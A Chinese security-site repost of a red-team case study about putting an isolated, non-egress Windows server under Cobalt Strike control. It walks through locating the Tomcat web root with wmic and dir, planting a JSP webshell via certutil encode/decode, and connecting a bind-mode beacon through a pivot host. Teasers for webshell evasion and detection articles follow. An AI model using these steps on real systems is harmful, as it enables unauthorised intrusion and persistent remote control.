<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    一次不出網上線cs實戰案例

    VSole2022-07-26 08:58:11

    場景

    shiro打點獲取10段服務器權限,在10段機器出網且已上線cs;172段不出網且反向不通10段,已通過mysql弱口令獲取system權限,存在web服務。

    上線過程

    思路:寫入webshell,通過正向馬上線cs。

    getshell

    通過web服務獲取一個web目錄下的文件名:stf-login-bg.jpg

    獲取所有盤符

    wmic logicaldisk get caption,name

    通過文件名獲取web目錄

    dir /a /s /b d:\"stf-login-bg.jpg"

    根據圖片URL確定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg為真實web路徑,使用\可dir到此路徑。

    echo配合certutil寫入webshell:

    //base64編碼shell.jsp
certutil -encode shell.jsp jsp.txt 

//echo編碼后的內容到web目錄
echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt

//解碼還原文件
certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp

    上線cs

    新建監聽器

    生成正向馬

    通過webshell上傳到目標機器并執行,使用跳板機連接,上線cs。

    connect 172.20.57.122 28888

    文章來源:tide安全團隊
    webshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    webshell新工具 -- PyShell
    2023-07-24 10:21:11
    0x01 工具介紹PyShell是多平臺Python WebShell。該工具可以幫助您在web服務器上獲得shell式的界面,以便遠程訪問。與其他webshell不同的是,該工具的主要目標是在服務器端使用盡可能少的代碼,而不考慮使用的語言或服務器的操作系統。您可以在 Windows 和 Linux 中使用不同類型的 shell,具有命令歷史記錄、上傳和下載文件,甚至可以像在目錄中一樣移動標準外殼。
    Webshell繞過360主動防御執行命令
    2023-06-15 09:40:25
    場景:己經拿到了一個webshell,但是無法正常執行命令,因為被360安全大腦的主動防御攔截了。由于目標是 java 環境,這里可以嘗試利用 jsp 執行系統命令上線,具體做法是先寫一個 jsp的腳本然后放到 weblogic 的 webshell 路徑下,如果找不到 webshell 可以使用文件查找命令dir c:\ /s /b |find "fuck4.jsp"
    基于終端的Webshell??管理器-Webshell-Sniper
    2023-04-27 09:11:14
    Webshell-Sniper是一款使用Python編寫的基于終端的Webshell管理器,和以往我們分享的Webshell管理工具有所不同,所有操作都在終端中完成。使用它可對您的網站進行遠程管理。雖然它沒有圖形化的GUI也沒有WEB界面,但這樣的操作也是另有一翻感覺。功能基于終端的shell交互反向連接shell數據庫管理Webshell-Sniper安裝與使用環境服務端 :. 需要注意的是,Webshell-Sniper服務端只支持Unix系統環境。
    webshell管理工具 -- Webshell_Generate
    2023-03-27 09:52:21
    0x01 工具介紹該工具沒什么技術含量,學了一點javafx,使用jdk8開發出了幾個簡單功能用來管理webshell。工具整合并改寫了各類webshell,支持各個語言的cmd、蟻劍、冰蝎、哥斯拉,又添加了實際中應用到的一些免殺技巧,以方便實際需要。0x02 安裝與使用直接下載releases版即可。
    Webshell 檢測綜述
    2022-12-15 09:45:32
    通過Webshell,攻擊者可以在目標服務器上執行一些命令從而完成信息嗅探、數據竊取或篡改等非法操作,對Web服務器造成巨大危害。Webshell惡意軟件是一種長期存在的普遍威脅,能夠繞過很多安全工具的檢測。許多研究人員在Webshell檢測領域進行了深入研究,并提出了一些卓有成效的方法。本文以PHP Webshell為例。
    webshell免殺之函數與變量玩法
    2022-10-28 17:17:19
    動態函數PHP中支持一個功能叫 variable function ,變量函數的意思。//最終是system;當一個變量后邊帶括號,那他就被視作一個函數。編譯器會解析出變量的值,然后會去找當前是否存在名為“system()”的函數并執行它。這里就不給實例了,很多免殺案例中都用到了這個特性。也是被瘋狂查殺的特征。回調函數回調函數,簡單來說就是一個函數不是由我直接調用,而是通過另一個函數去調用它。
    webshell免殺中符號的妙用
    2022-09-23 15:48:49
    前言提到webshell免殺,方法無外乎對靜態特征的變形,編碼,或利用語言特性繞過。計算機中有很多符號,它們在編程語言中占據一席之地,這些符號作為運算符號,標識符號或起到特殊含義。本文以PHP為例介紹一些利用符號免殺方法。免殺WAF檢測通過對安全狗、護衛神、D盾等常見軟WAF的測試,發現WAF查殺主要依賴兩種檢測方法1.靜態檢測:通過匹配特征來查找webshell。如危險函數,文件特征碼等。例如 ${$my_var[8]}與${$my_var}[8]的區分${xxx} 括起來的要當成變量處理。
    應急響應之如何快速定位Webshell文件?
    2022-07-24 22:00:49
    通過URL信息獲取如果能獲取到惡意請求的URL信息,就可以根據URL信息定位到Webshell文件。URL信息可以通過態勢感知、WAF等監測預警系統獲取,也可以通過對系統異常時間段的Web日志進行審計獲取。通過掃描工具掃描獲取通過Webshell查殺工具進行掃描,可以定位到部分免殺能力不強的Webshell文件。默認情況下,Windows將僅在索引位置中查找最近修改的文件。
    什么?你還不會webshell免殺?(二)
    2022-07-22 17:05:46
    webshell免殺之傳參方式及特征繞過傳參方式 在這里解釋一下為什么,需要講述傳參方式,由于在很多情況下,以請求頭作為參數傳遞并非waf和人工排查的重中之重且非常誤導和隱藏
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类